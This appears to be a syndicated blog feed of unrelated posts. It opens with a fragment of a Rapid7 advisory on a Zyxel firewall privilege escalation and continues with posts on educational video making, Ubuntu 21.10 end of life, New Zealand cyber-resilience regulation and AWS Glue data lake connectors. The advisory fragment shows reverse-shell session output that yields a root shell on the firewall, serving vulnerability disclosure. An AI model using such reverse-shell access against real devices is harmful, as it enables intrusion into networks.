Listening on 0.0.0.0 1270
Connection received on 10.0.0.14 36836
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.1# id
id
uid=0(root) gid=0(root) groups=0(root)
bash-5.1# uname -a
uname -a
Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
bash-5.1# 

CVE-2022-30525 Patch Adoption

CVE-2022-30526 is only useful when used with another vulnerability, such as CVE-2022-30525. Rapid7 has been monitoring patch adoption on Shodan since CISA added the vulnerability to their Known Exploited Vulnerabilities Catalog. We are happy to note that patch adoption has continued to rise over time.

CVE-2022-30526 (Fixed): Zyxel Firewall Local Privilege Escalation

Metasploit Module

A Metasploit module has been developed for this vulnerability. The module is best used in conjunction with the previously published Zyxel Firewall ZTP Unauthenticated Command Injection. The following video demonstrates escalation from nobody to root access:



CVE-2022-30526 (Fixed): Zyxel Firewall Local Privilege Escalation

Credit

These issues were discovered by Jake Baines of Rapid7, and they are being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Remediation

Zyxel released a fix for this issue on July 19, 2022. Please see Zyxel’s advisory for detailed patching information.

Disclosure Timeline

April 2022 – Discovered by Jake Baines
April 13, 2022 – Rapid7 discloses to [email protected]. Proposed disclosure date June 14, 2022.
April 14, 2022 – Zyxel acknowledges receipt.
April 20, 2022 – Rapid7 asks for an update and shares delight over “Here is how to pronounce ZyXEL’s name”.
April 21, 2022 – Zyxel acknowledges reproduction of the vulnerabilities.
April 29, 2022 – Zyxel disputes that the LPE is a vulnerability, instead calls it “a design flaw.”
April 29, 2022 – Rapid7 asks about CVE assignment, guidance on coordinated disclosure, and for the vendor to reconsider their stance on the LPE.
May 9, 2022 – Zyxel indicates fixing the LPE will take time. Asks Rapid7 to hold full disclosure until November.
May 9, 2022 – Rapid7 informs Zyxel of the intent to disclose this issue on June 14, 2022.
May 10, 2022 – Zyxel acknowledges and plans to coordinate. Assigns CVE-2022-30526.
May 11, 2022 – Rapid7 reaffirms plan to wait until June 14.
May 12, 2022 – Zyxel catches accidental mentions of LPE in planned disclosure for CVE-2022-30525.
May 12, 2022 – Rapid7 removes the reference.
May 23, 2022 – Zyxel says they are pushing disclosure for CVE-2022-30526 out to July 19.
May 23, 2022 – Rapid7 agrees to July 19 disclosure date.
July 19, 2022 – Zyxel publishes their advisory.
July 19, 2022 – Rapid7 publishes this advisory.

How to create great educational video content for computing and beyond

Post Syndicated from Michael Conterio original https://www.raspberrypi.org/blog/how-to-create-educational-video-content-computing-computer-science/

Over the past five years, we’ve made lots of online educational video content for our online courses, for our Isaac Computer Science platform for GCSE and A level, and for our remote lessons based on our Teach Computing Curriculum hosted on Oak National Academy.

We have learned a lot from experience and from learner feedback, and we want to share this knowledge with others. We’re also aware there’s always more to learn from people across the computing education community. That’s one reason we’re continually working to broaden the range of educators we work with. Another is that we want all learners to see themselves represented in our educational materials, because everyone belongs in computer science.

Facilitators and participants involved in the Teach Online programme.
RPF staff and the Teach Online participants

To make progress with all these goals, we ran a pilot programme for educators called Teach Online at the end of 2021 and the start of 2022. Through Teach Online, we provided twelve educators with training, opportunities, and financial and material support to help them with creating online educational content, particularly videos.

Over five online sessions and a final in-person day, we trained them in not only the production of educational videos, but also some of the pedagogy behind it. The pilot programme has now finished, and we thought we’d share some of the key points from the sessions with you in the wider community.

Learning to create a great online learning experience

When you learn new skills and knowledge, it’s important to think about how you apply these. For this reason, a useful question you can use throughout the learning process is “Why?”. So as you think about how to create the best online learning experience, ask yourself in different contexts throughout the content design and production:

  • Why am I using this style of video to illustrate this topic?
  • Why am I presenting these ideas in this order?
  • Why am I using this choice of words?

For example, it’s easy to default to creating ‘talking head’ videos featuring one person talking directly to the camera. But you should always ask why — what are the reasons for using a ‘talking head’ style. Instead, or in addition, you can make videos more engaging and support the learning experience by:

  • Turning the video into an interview
  • Adding other camera angles or screencasts to focus on demonstrations
  • Cutting away to B-roll footage (additional video that can provide context or related action, while the voiceover continues) or to still images that help connect a concept to concrete examples
Teach Computing programme participant.
Teach Online participants explored different ways to make their videos engaging

Planning is key

By planning your content carefully instead of jumping into production right away, you can:

  • Better visualise what your video should look like by creating a storyboard
  • Keep learners engaged by deliberately splitting learning up into smaller chunks while still keeping a narrative flow between them
  • Develop your learners’ understanding of key computing concepts by using semantic waves to unpack and repack concepts

The Teach Online participants told us that they particularly enjoyed learning more about planning videos:

“I now understand that a little planning can make the difference between a mediocre online learning experience and a professional-looking valuable learning experience.” – Educator who participated in our Teach Online programme

“Planning the session using a storyboard is so helpful to visualise the actual recording.” – Educator who participated in our Teach Online programme

Storyboard from a Teach Computing participant.
Storyboards are a great option to plan online learning experiences

Considering equity, diversity, and inclusion

We are committed to making computing and computer science accessible and engaging, so we embed measures to improve equity, diversity, and inclusion throughout our free learning and teaching resources, including the Teach Online programme. It’s important not to leave this aspect of creating educational content as an afterthought: you can only make sure that your content is truly as equitable and inclusive as you can make it if you address this at every stage of your process. As an added bonus, many ways of making your content more accessible not only benefit learners with specific needs, but support and engage all of your audience so everyone can learn more easily.

Best practices that you can use while creating online content include:

Connecting with your learner audience

One of video’s key advantages is the ability to immediately connect with the audience. To help with that, you can try to talk directly to a single viewer, using “you” and “I” rather than “we”. You can also show off your personality in the presentation slides you use and the backgrounds of your videos.

“[I will use my learning from the programme] by adapting teaching and learning to actively engage learners.” – Educator who participated in our Teach Online programme

It’s important to find your own personal presenting style. There is not one perfect way to present, and you should experiment to find how you are best able to communicate with your viewers. How formal or informal will you be? Is your delivery calm or energetic? Whatever you decide, you may want to edit your script to better fit your style. A practical tip for doing this is to read your video scripts aloud while you are writing them to spot any language that feels awkward to you when spoken. 

“It was really great to try the presenting skills, and I learned a lot about my style.” – Educator who participated in our Teach Online programme

A videographer preparing to film a course presenter.

Connecting with each other

Throughout the Teach Online programme, we helped participants create a community with each other. Finding your own community can give you the support that you need to create, and help you continue to develop your knowledge and skills. Working together is great, whether that’s collaborating in-person locally, or online via for example the CAS forums or social media.

“I very much liked the diverse group of educators in this programme, and appreciated everyone sharing their experiences and tips.” – Educator who participated in our Teach Online programme

The Teach Online graduate have told us about the positive impact the programme has had on their teaching in their own contexts. So far we’ve worked with graduates to create Isaac Computer Science videos covering data structures, high- and low-level languages, and string handling.

What do you want to know about creating online educational content?

There is a growing need for online educational content, particularly videos — not only to improve access to education, but also to support in-person teaching. By investing in training educators, we help diversify the pool of people working in this area, improve the confidence of those who would like to start, and provide them with the skills and knowledge to successfully create great content for their learners.

In the future we’d also like to support the wider community of educators with creating online educational content. What resources would you find useful? Share your thoughts in the comments section below.

The post How to create great educational video content for computing and beyond appeared first on Raspberry Pi.

Ubuntu 21.10 is no longer supported

Post Syndicated from original https://lwn.net/Articles/901755/

The Ubuntu 21.10 (“Impish Indri”) release is no longer supported as of
July 14; users who are on that version will want to look into
upgrading soon.

This is a follow-up to the End of Life warning sent earlier to confirm
that as of July 14, 2022, Ubuntu 21.10 is no longer supported. No more
package updates will be accepted to 21.10, and it will be archived to
old-releases.ubuntu.com in the coming weeks.

A pathway to the cloud: Analysis of the Reserve Bank of New Zealand’s Guidance on Cyber Resilience

Post Syndicated from Julian Busic original https://aws.amazon.com/blogs/security/a-pathway-to-the-cloud-analysis-of-the-reserve-bank-of-new-zealands-guidance-on-cyber-resilience/

The Reserve Bank of New Zealand’s (RBNZ’s) Guidance on Cyber Resilience (referred to as “Guidance” in this post) acknowledges the benefits of RBNZ-regulated financial services companies in New Zealand (NZ) moving to the cloud, as long as this transition is managed prudently—in other words, as long as entities understand the risks involved and manage them appropriately. In this blog post, I analyze the RBNZ’s thinking as it developed the Guidance, and how the Guidance creates opportunities for NZ financial services customers to accelerate migration of workloads—including critical systems—to the Amazon Web Services (AWS) Cloud.

On page 14 of its Guidance, the RBNZ writes that “[i]f used prudently, third-party services may reduce an entity’s cyber risk, especially for those entities that lack cyber expertise.” This open regulatory stance towards the cloud enables our NZ financial services customers to consider a cloud first strategy for both new and existing systems, including critical workloads. Customers must, however, manage the transition to the cloud prudently, working closely with both their cloud service provider and their regulators.

This blog post is aimed at boards, management, and technology decision-makers, for whom understanding regulatory thinking is a useful input when developing an enterprise cloud strategy.

Operational technology staff and risk practitioners seeking detailed guidance on how AWS helps you align with the RBNZ’s Guidance can download our New Zealand Financial Services whitepaper from our public website and the AWS Reserve Bank of New Zealand Guidance on Cyber Resilience (RBNZ-GCR) Workbook from AWS Artifact, a self-service portal for you to access AWS compliance reports.

Overview and applicability

The RBNZ’s Guidance sets out the RBNZ’s expectations for management of cyber resilience. It’s aimed at all registered banks, licensed non-bank deposit takers, licensed insurers, and designated financial market infrastructures that are regulated by the RBNZ. The Guidance makes a series of non-binding recommendations across four domains—Governance, Capability Building, Information Sharing, and Third-Party Management.

Each section of the Guidance has a short preamble, summarizing the RBNZ’s expectations for effective risk management in each domain and providing insights into why the RBNZ is making specific recommendations.

The Guidance can be tailored to an entity’s individual needs, technology choices, and risk appetite. Boards, management, and technology decision-makers should familiarize themselves with the RBNZ’s Guidance, ascertain how closely their own organization aligns to it, and work to remediate any identified gaps.

Why non-binding guidance and not an enforceable standard?

The RBNZ gives several reasons (see RBNZ Summary of submissions, paragraphs 9-16) for choosing to publish non-binding recommendations rather than legally binding requirements. The RBNZ declares an intent to monitor adoption of its recommendations by industry, and indicates that future policy settings might include developing legally binding standards for cyber resilience. In this respect, the RBNZ’s approach is similar to that of the Australian Prudential Regulation Authority (APRA), which first issued non-binding guidance on management of IT security risk in 2013, before moving to a legally binding standard in 2019.

The RBNZ gives the following reasons for choosing guidance over a standard:

  • The RBNZ’s policy stance of being moderately active in respect to cyber resilience
  • A previous light-touch approach regarding cyber resilience
  • Providing sufficient time for industry to adjust to new policy settings, given the wide range of maturity within financial services organizations in New Zealand
  • The gap between New Zealand’s and other jurisdictions’ cyber readiness
  • The RBNZ’s current ability to effectively monitor and ensure compliance

The RBNZ indicates that it will “work together with the industry to operationalise the finalised Guidance” (RBNZ Summary of submissions, paragraph 10) and that it is “looking to strengthen [its] cyber resilience expertise in [its] financial stability function” although this will “take time to achieve” (RBNZ Summary of submissions, paragraph 9).

RBNZ-regulated entities should already be self-assessing against the Guidance and working to address gaps as a matter of priority. This is not just because the Guidance could become a legally binding standard in the next 3–5 years, but because the RBNZ has created a practical and flexible framework for the management of cyber risk, which will greatly enhance the NZ financial sector’s resilience to cyber incidents. Non–RBNZ-regulated entities looking for a benchmark to measure themselves against can also use the RBNZ’s Guidance to assess and improve the effectiveness of their own control environments.

Comparing rules-based frameworks and principles-based frameworks

There are two main ways that regulators communicate their risk management expectations to their regulated entities. These are a rules-based approach (sometimes called a compliance-based approach) and a principles-based approach. The RBNZ’s Guidance takes a principles-based approach towards the management of cyber risk.

With a rules-based approach, the regulator takes responsibility for identifying risks and lays out explicit and granular controls that regulated entities are required to implement. A rules-based approach is highly prescriptive, meaning that regulated entities can adopt a checklist approach in meeting their regulators’ requirements. This approach, although it gives certainty to regulated entities regarding the controls they are expected to adopt, can have disadvantages for regulators:

  • Creating and maintaining detailed technical rules can be challenging, given the pace at which technology and the threat environment evolve.
  • Regulators have a diverse population of regulated entities, so a rules-based approach can be inflexible or have blind spots.
  • A rules-based approach doesn’t encourage entities to actively identify and manage their own unique set of risks.

By contrast, a principles-based approach describes a set of desired regulatory or risk-management outcomes, but it isn’t prescriptive in how regulated entities achieve these goals. Regulators act in a vendor- and technology-neutral manner, and regulated entities are expected to interpret regulatory requirements or guidance in the context of their individual business models, technology choices, threat environments, and risk appetites.

Under a principles-based approach, an entity must be able to demonstrate to its regulators’ satisfaction that it both understands the current and emerging risks it faces, and that it is managing these risks appropriately. For example, the principle that entities “[…] should develop and maintain a programme for continuing cyber resilience training for staff at all levels” (Guidance, section A3.3 page 6) gives clear direction, but leaves it up to the entity to decide on the approach to take, and how the entity will demonstrate to the RBNZ that this principle is being met.

A principles-based approach avoids the issues with the rules-based approach that I outlined previously—this approach is significantly longer-lived than a rules-based approach, it moves responsibility for effective risk identification and management from the regulator to the entity (which better understands its own risk profile and appetite), and the framework can be applied to a regulated entity population that varies in size, nature, and complexity.

Freedom to innovate under a principles-based approach

The RBNZ says that its Guidance should be employed in a manner “[…] proportionate to the size, structure and operational environment of an entity, as well as the nature, scope, complexity and risk profile of its products and services” (Guidance, page 2).

You can therefore meet the RBNZ’s Guidance in many different ways, as long as you can demonstrate to the RBNZ that your organization understands the risks it is facing and is managing them appropriately. A principles-based approach creates opportunities for innovation, because there are many different ways to meet a set of regulatory principles.

If you are an NZ financial services customer who also operates in Australia, you might note that the RBNZ’s approach aligns to that of the principal financial services regulator in Australia—the Australian Prudential Regulation Authority (APRA). APRA also takes a principles-based approach to its prudential framework, “avoiding excessive prescription where possible to allow for the diversity of practice according to the size, business activity, and sophistication of the institutions being supervised” (APRA’s objectives, Chapter 1).

A cautious green light to the cloud for New Zealand financial services

“If used prudently, third-party services may reduce an entity’s cyber risk, especially for those entities that lack cyber expertise” (Guidance, page 14).

In my view, this statement represents a (cautious) green light for financial services customers in NZ who wish to migrate systems to the AWS Cloud, although as the RBNZ makes clear, you “should be fully aware of the cyber risk associated with third parties and act appropriately to mitigate that risk” (Guidance, page 14). The RBNZ also requests that for critical functions, entities “[…] should inform the Reserve Bank about their outsourcing of critical functions to cloud service providers early in their decision-making process” (Guidance, Section D8.1, page 17).

The RBNZ defines a critical function as “[a]ny activity, function, process, or service, the loss of which (for even a short period of time) would materially affect the continued operation of an entity, the market it serves and the broader financial system, and/or materially affect the data integrity, reputation of an entity and confidence in the financial system” (Guidance, page 19).

Although the RBNZ doesn’t elaborate further on why it requests early notification about outsourcing of critical functions to the cloud, it’s likely that early engagement is requested so that the RBNZ has the opportunity to provide early feedback on any areas of potential concern, before the initiative is significantly progressed and a large amount of resources are committed.

Migration of higher-risk workloads to the cloud will naturally attract higher levels of regulatory scrutiny, but this doesn’t change the RBNZ’s open regulatory stance on cloud security. This stance is further emphasized by the RBNZ’s comment that “If managed prudently, migrating to the cloud presents a number of benefits including geographically dispersed infrastructures, agility to scale more quickly, improved automation, sufficient redundancy, and reduced initial investment costs for individual financial institutions” (Guidance, page 15).

Building innovative, secure, and highly resilient solutions on AWS, and using the high levels of visibility that you have into your environments that are running on AWS, can help you demonstrate to your regulators how you are identifying and managing your cyber resilience risks in line with the RBNZ’s Guidance.

A note on regulatory myths

In conversations with customers, I occasionally encounter “regulatory myths,” such as “certain types of workloads are prohibited in the cloud,” or “my regulator won’t allow me to use multi-region architectures.”

To date, the RBNZ has not made specific recommendations or set specific requirements regarding technology solutions. This includes, but is not limited to, choice of vendors or technology platforms, prescription of particular architectures, or the types of workload that may or may not be migrated to the cloud. Remember, the RBNZ’s Guidance is a principles-based framework, and is vendor-, technology-, and solution-neutral.

We have many examples of financial services companies all over the world successfully running critical workloads in the AWS Cloud, but regulatory myths and misunderstandings can inhibit our customers’ ability to “think big” when developing their cloud strategies. If you believe that you must implement specific technical patterns to meet regulatory expectations, we encourage you to contact the RBNZ to discuss any aspects of the Guidance that require clarification. We also encourage you to contact your AWS account team, who can arrange support from internal AWS risk and regulatory specialists, particularly if critical systems are proposed for migration to AWS.

Conclusion

The RBNZ’s Guidance on Cyber Resilience is an important first step for financial services regulation of cybersecurity in NZ. The Guidance can be considered cloud friendly because it acknowledges that prudent use of third parties (such as AWS) can reduce cyber risk, especially for entities that lack cyber expertise, and outlines several benefits of the cloud over traditional on-premises infrastructure, including resilience and redundancy, ability to scale, and reduced initial investment costs.

The principles-based nature of the RBNZ’s Guidance creates opportunities for you to develop innovative solutions in the AWS Cloud, because there are many different ways to meet the principles contained in the RBNZ’s Guidance. The key consideration is that you demonstrate to your regulators that you both understand the cyber risks you face in moving to the AWS Cloud, and manage them appropriately.

The launch of the AWS Asia Pacific (Auckland) Region in 2024, our wide range of products and services, and the visibility that you have into the AWS control environment (through AWS Artifact) and your own environment (through services like Amazon GuardDuty and AWS Security Hub) can all help you demonstrate to the RBNZ that you are managing cyber risk in accordance with the RBNZ’s expectations.

Next steps

Boards, executives, and technology decision-makers should familiarize themselves with the RBNZ’s Guidance, and if they aren’t already doing so, conduct a self-assessment and initiate a body of work to address identified gaps.

In view of the RBNZ’s cautious green light for prudent migration to the cloud—including for critical systems—NZ financial services customers should review their existing cloud strategies and identify areas where they can both broaden and accelerate their cloud journeys. The AWS Cloud Adoption Framework (AWS CAF) offers guidance and best practices to help organizations develop an efficient and effective plan for their cloud adoption journey. The AWS C-suite Guide to Shared Responsibility for Cloud Security and Data Safe Cloud eBook inform boards and senior management about both the benefits and risks of operating in the cloud.

Operational technology staff and risk practitioners can download our New Zealand Financial Service whitepaper from our public website and the AWS Reserve Bank of New Zealand Guidance on Cyber Resilience (RBNZ-GCR) Workbook from AWS Artifact. The RBNZ-GCR is particularly useful for operational IT staff and risk practitioners because it provides prescriptive guidance on which controls to implement on your side of the shared responsibility model and which AWS controls you inherit from the service.

Finally, contact your AWS representative to discuss how the AWS Partner Network, AWS solution architects, AWS Professional Services teams, and AWS Training and Certification can assist with your cloud adoption journey. If you don’t have an AWS representative, contact us at https://aws.amazon.com/contact-us.

 
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Want more AWS Security news? Follow us on Twitter.

Author

Julian Busic

Julian is a Security Solutions Architect with a focus on regulatory engagement. He works with our customers, their regulators, and AWS teams to help customers raise the bar on secure cloud adoption and usage. Julian has over 15 years of experience working in risk and technology across the financial services industry in Australia and New Zealand.

Process Apache Hudi, Delta Lake, Apache Iceberg datasets at scale, part 1: AWS Glue Studio Notebook

Post Syndicated from Noritaka Sekiyama original https://aws.amazon.com/blogs/big-data/part-1-integrate-apache-hudi-delta-lake-apache-iceberg-datasets-at-scale-aws-glue-studio-notebook/

Cloud data lakes provides a scalable and low-cost data repository that enables customers to easily store data from a variety of data sources. Data scientists, business analysts, and line of business users leverage data lake to explore, refine, and analyze petabytes of data. AWS Glue is a serverless data integration service that makes it easy to discover, prepare, and combine data for analytics, machine learning, and application development. Customers use AWS Glue to discover and extract data from a variety of data sources, enrich and cleanse the data before storing it in data lakes and data warehouses.

Over years, many table formats have emerged to support ACID transaction, governance, and catalog usecases. For example, formats such as Apache Hudi, Delta Lake, Apache Iceberg, and AWS Lake Formation governed tables, enabled customers to run ACID transactions on Amazon Simple Storage Service (Amazon S3). AWS Glue supports these table formats for batch and streaming workloads. This post focuses on Apache Hudi, Delta Lake, and Apache Iceberg, and summarizes how to use them in AWS Glue 3.0 jobs. If you’re interested in AWS Lake Formation governed tables, then visit Effective data lakes using AWS Lake Formation series.

Bring libraries for the data lake formats

Today, there are three available options for bringing libraries for the data lake formats on the AWS Glue job platform: Marketplace connectors, custom connectors (BYOL), and extra library dependencies.

Marketplace connectors

AWS Glue Connector Marketplace is the centralized repository for cataloging the available Glue connectors provided by multiple vendors. You can subscribe to more than 60 connectors offered in AWS Glue Connector Marketplace as of today. There are marketplace connectors available for Apache Hudi, Delta Lake, and Apache Iceberg. Furthermore, the marketplace connectors are hosted on Amazon Elastic Container Registry (Amazon ECR) repository, and downloaded to the Glue job system in runtime. When you prefer simple user experience by subscribing to the connectors and using them on your Glue ETL jobs, the marketplace connector is a good option.

Custom connectors as bring-your-own-connector (BYOC)

AWS Glue custom connector enables you to upload and register your own libraries located in Amazon S3 as Glue connectors. You have more control over the library versions, patches, and dependencies. Since it uses your S3 bucket, you can configure the S3 bucket policy to share the libraries only with specific users, you can configure private network access to download the libraries using VPC Endpoints, etc. When you prefer having more control over those configurations, the custom connector as BYOC is a good option.

Extra library dependencies

There is another option – to download the data lake format libraries, upload them to your S3 bucket, and add extra library dependencies to them. With this option, you can add libraries directly to the job without a connector and use them. In Glue job, you can configure in Dependent JARs path. In API, it’s the --extra-jars parameter. In Glue Studio notebook, you can configure in the %extra_jars magic. To download the relevant JAR files, see the library locations in the section Create a Custom connection (BYOC).

Create a Marketplace connection

To create a new marketplace connection for Apache Hudi, Delta Lake, or Apache Iceberg, complete the following steps.

Apache Hudi 0.10.1

Complete the following steps to create a marketplace connection for Apache Hudi 0.10.1:

  1. Open AWS Glue Studio.
  2. Choose Connectors.
  3. Choose Go to AWS Marketplace.
  4. Search for Apache Hudi Connector for AWS Glue, and choose Apache Hudi Connector for AWS Glue.
  5. Choose Continue to Subscribe.
  6. Review the Terms and conditions, pricing, and other details, and choose the Accept Terms button to continue.
  7. Make sure that the subscription is complete and you see the Effective date populated next to the product, and then choose Continue to Configuration.
  8. For Delivery Method, choose Glue 3.0.
  9. For Software version, choose 0.10.1.
  10. Choose Continue to Launch.
  11. Under Usage instructions, choose Activate the Glue connector in AWS Glue Studio. You’re redirected to AWS Glue Studio.
  12. For Name, enter a name for your connection.
  13. Optionally, choose a VPC, subnet, and security group.
  14. Choose Create connection.

Delta Lake 1.0.0

Complete the following steps to create a marketplace connection for Delta Lake 1.0.0:

  1. Open AWS Glue Studio.
  2. Choose Connectors.
  3. Choose Go to AWS Marketplace.
  4. Search for Delta Lake Connector for AWS Glue, and choose Delta Lake Connector for AWS Glue.
  5. Choose Continue to Subscribe.
  6. Review the Terms and conditions, pricing, and other details, and choose the Accept Terms button to continue.
  7. Make sure that the subscription is complete and you see the Effective date populated next to the product, and then choose Continue to Configuration.
  8. For Delivery Method, choose Glue 3.0.
  9. For Software version, choose 1.0.0-2.
  10. Choose Continue to Launch.
  11. Under Usage instructions, choose Activate the Glue connector in AWS Glue Studio. You’re redirected to AWS Glue Studio.
  12. For Name, enter a name for your connection.
  13. Optionally, choose a VPC, subnet, and security group.
  14. Choose Create connection.

Apache Iceberg 0.12.0

Complete the following steps to create a marketplace connection for Apache Iceberg 0.12.0:

  1. Open AWS Glue Studio.
  2. Choose Connectors.
  3. Choose Go to AWS Marketplace.
  4. Search for Apache Iceberg Connector for AWS Glue, and choose Apache Iceberg Connector for AWS Glue.
  5. Choose Continue to Subscribe.
  6. Review the Terms and conditions, pricing, and other details, and choose the Accept Terms button to continue.
  7. Make sure that the subscription is complete and you see the Effective date populated next to the product, and then choose Continue to Configuration.
  8. For Delivery Method, choose Glue 3.0.
  9. For Software version, choose 0.12.0-2.
  10. Choose Continue to Launch.
  11. Under Usage instructions, choose Activate the Glue connector in AWS Glue Studio. You’re redirected to AWS Glue Studio.
  12. For Name, enter iceberg-0120-mp-connection.
  13. Optionally, choose a VPC, subnet, and security group.
  14. Choose Create connection.

Create a Custom connection (BYOC)

You can create your own custom connectors from JAR files. In this section, you can see the exact JAR files that are used in the marketplace connectors. You can just use the files for your custom connectors for Apache Hudi, Delta Lake, and Apache Iceberg.

To create a new custom connection for Apache Hudi, Delta Lake, or Apache Iceberg, complete the following steps.

Apache Hudi 0.9.0

Complete following steps to create a custom connection for Apache Hudi 0.9.0:

  1. Download the following JAR files, and upload them to your S3 bucket.
    1. https://repo1.maven.org/maven2/org/apache/hudi/hudi-spark3-bundle_2.12/0.9.0/hudi-spark3-bundle_2.12-0.9.0.jar
    2. https://repo1.maven.org/maven2/org/apache/hudi/hudi-utilities-bundle_2.12/0.9.0/hudi-utilities-bundle_2.12-0.9.0.jar
    3. https://repo1.maven.org/maven2/org/apache/parquet/parquet-avro/1.10.1/parquet-avro-1.10.1.jar
    4. https://repo1.maven.org/maven2/org/apache/spark/spark-avro_2.12/3.1.1/spark-avro_2.12-3.1.1.jar
    5. https://repo1.maven.org/maven2/org/apache/calcite/calcite-core/1.10.0/calcite-core-1.10.0.jar
    6. https://repo1.maven.org/maven2/org/datanucleus/datanucleus-core/4.1.17/datanucleus-core-4.1.17.jar
    7. https://repo1.maven.org/maven2/org/apache/thrift/libfb303/0.9.3/libfb303-0.9.3.jar
  2. Open AWS Glue Studio.
  3. Choose Connectors.
  4. Choose Create custom connector.
  5. For Connector S3 URL, enter comma separated Amazon S3 paths for the above JAR files.
  6. For Name, enter hudi-090-byoc-connector.
  7. For Connector Type, choose Spark.
  8. For Class name, enter org.apache.hudi.
  9. Choose Create connector.
  10. Choose hudi-090-byoc-connector.
  11. Choose Create connection.
  12. For Name, enter hudi-090-byoc-connection.
  13. Optionally, choose a VPC, subnet, and security group.
  14. Choose Create connection.

Apache Hudi 0.10.1

Complete the following steps to create a custom connection for Apache Hudi 0.9.0:

  1. Download following JAR files, and upload them to your S3 bucket.
    1. hudi-utilities-bundle_2.12-0.10.1.jar
    2. hudi-spark3.1.1-bundle_2.12-0.10.1.jar
    3. spark-avro_2.12-3.1.1.jar
  2. Open AWS Glue Studio.
  3. Choose Connectors.
  4. Choose Create custom connector.
  5. For Connector S3 URL, enter comma separated Amazon S3 paths for the above JAR files.
  6. For Name, enter hudi-0101-byoc-connector.
  7. For Connector Type, choose Spark.
  8. For Class name, enter org.apache.hudi.
  9. Choose Create connector.
  10. Choose hudi-0101-byoc-connector.
  11. Choose Create connection.
  12. For Name, enter hudi-0101-byoc-connection.
  13. Optionally, choose a VPC, subnet, and security group.
  14. Choose Create connection.

Note that the above Hudi 0.10.1 installation on Glue 3.0 does not fully support Merge On Read (MoR) tables.

Delta Lake 1.0.0

Complete the following steps to create a custom connector for Delta Lake 1.0.0:

  1. Download the following JAR file, and upload it to your S3 bucket.
    1. https://repo1.maven.org/maven2/io/delta/delta-core_2.12/1.0.0/delta-core_2.12-1.0.0.jar
  2. Open AWS Glue Studio.
  3. Choose Connectors.
  4. Choose Create custom connector.
  5. For Connector S3 URL, enter a comma separated Amazon S3 path for the above JAR file.
  6. For Name, enter delta-100-byoc-connector.
  7. For Connector Type, choose Spark.
  8. For Class name, enter org.apache.spark.sql.delta.sources.DeltaDataSource.
  9. Choose Create connector.
  10. Choose delta-100-byoc-connector.
  11. Choose Create connection.
  12. For Name, enter delta-100-byoc-connection.
  13. Optionally, choose a VPC, subnet, and security group.
  14. Choose Create connection.

Apache Iceberg 0.12.0

Complete the following steps to create a custom connection for Apache Iceberg 0.12.0:

  1. Download the following JAR files, and upload them to your S3 bucket.
    1. https://search.maven.org/remotecontent?filepath=org/apache/iceberg/iceberg-spark3-runtime/0.12.0/iceberg-spark3-runtime-0.12.0.jar
    2. https://repo1.maven.org/maven2/software/amazon/awssdk/bundle/2.15.40/bundle-2.15.40.jar
    3. https://repo1.maven.org/maven2/software/amazon/awssdk/url-connection-client/2.15.40/url-connection-client-2.15.40.jar
  2. Open AWS Glue Studio.
  3. Choose Connectors.
  4. Choose Create custom connector.
  5. For Connector S3 URL, enter comma separated Amazon S3 paths for the above JAR files.
  6. For Name, enter iceberg-0120-byoc-connector.
  7. For Connector Type, choose Spark.
  8. For Class name, enter iceberg.
  9. Choose Create connector.
  10. Choose iceberg-0120-byoc-connector.
  11. Choose Create connection.
  12. For Name, enter iceberg-0120-byoc-connection.
  13. Optionally, choose a VPC, subnet, and security group.
  14. Choose Create connection.

Apache Iceberg 0.13.1

Complete the following steps to create a custom connection for Apache Iceberg 0.13.1:

  1. Download the following JAR files, and upload them to your S3 bucket.
    1. iceberg-spark-runtime-3.1_2.12-0.13.1.jar
    2. https://repo1.maven.org/maven2/software/amazon/awssdk/bundle/2.17.161/bundle-2.17.161.jar
    3. https://repo1.maven.org/maven2/software/amazon/awssdk/url-connection-client/2.17.161/url-connection-client-2.17.161.jar
  2. Open AWS Glue Studio.
  3. Choose Connectors.
  4. Choose Create custom connector.
  5. For Connector S3 URL, enter comma separated Amazon S3 paths for the above JAR files.
  6. For Name, enter iceberg-0131-byoc-connector.
  7. For Connector Type, choose Spark.
  8. For Class name, enter iceberg.
  9. Choose Create connector.
  10. Choose iceberg-0131-byoc-connector.
  11. Choose Create connection.
  12. For Name, enter iceberg-0131-byoc-connection.
  13. Optionally, choose a VPC, subnet, and security group.
  14. Choose Create connection.

Prerequisites

To continue this tutorial, you must create the following AWS resources in advance:

  • AWS Identity and Access Management (IAM) role for your ETL job or notebook as instructed in Set up IAM permissions for AWS Glue Studio. Note that AmazonEC2ContainerRegistryReadOnly or equivalent permissions are needed when you use the marketplace connectors.
  • Amazon S3 bucket for storing data.
  • Glue connection (one of the marketplace connector or the custom connector corresponding to the data lake format).

Reads/writes using the connector on AWS Glue Studio Notebook

The following are the instructions to read/write tables using each data lake format on AWS Glue Studio Notebook. As a prerequisite, make sure that you have created a connector and a connection for the connector using the information above.
The example notebooks are hosted on AWS Glue Samples GitHub repository. You can find 7 notebooks available. In the following instructions, we will use one notebook per data lake format.

Apache Hudi

To read/write Apache Hudi tables in the AWS Glue Studio notebook, complete the following:

  1. Download hudi_dataframe.ipynb.
  2. Open AWS Glue Studio.
  3. Choose Jobs.
  4. Choose Jupyter notebook and then choose Upload and edit an existing notebook. From Choose file, select your ipynb file and choose Open, then choose Create.
  5. On the Notebook setup page, for Job name, enter your job name.
  6. For IAM role, select your IAM role. Choose Create job. After a short time period, the Jupyter notebook editor appears.
  7. In the first cell, replace the placeholder with your Hudi connection name, and run the cell:
    %connections hudi-0101-byoc-connection (Alternatively you can use your connection name created from the marketplace connector).
  8. In the second cell, replace the S3 bucket name placeholder with your S3 bucket name, and run the cell.
  9. Run the cells in the section Initialize SparkSession.
  10. Run the cells in the section Clean up existing resources.
  11. Run the cells in the section Create Hudi table with sample data using catalog sync to create a new Hudi table with sample data.
  12. Run the cells in the section Read from Hudi table to verify the new Hudi table. There are five records in this table.
  13. Run the cells in the section Upsert records into Hudi table to see how upsert works on Hudi. This code inserts one new record, and updates the one existing record. You can verify that there is a new record product_id=00006, and the existing record product_id=00001’s price has been updated from 250 to 400.
  14. Run the cells in the section Delete a Record. You can verify that the existing record product_id=00001 has been deleted.
  15. Run the cells in the section Point in time query. You can verify that you’re seeing the previous version of the table where the upsert and delete operations haven’t been applied yet.
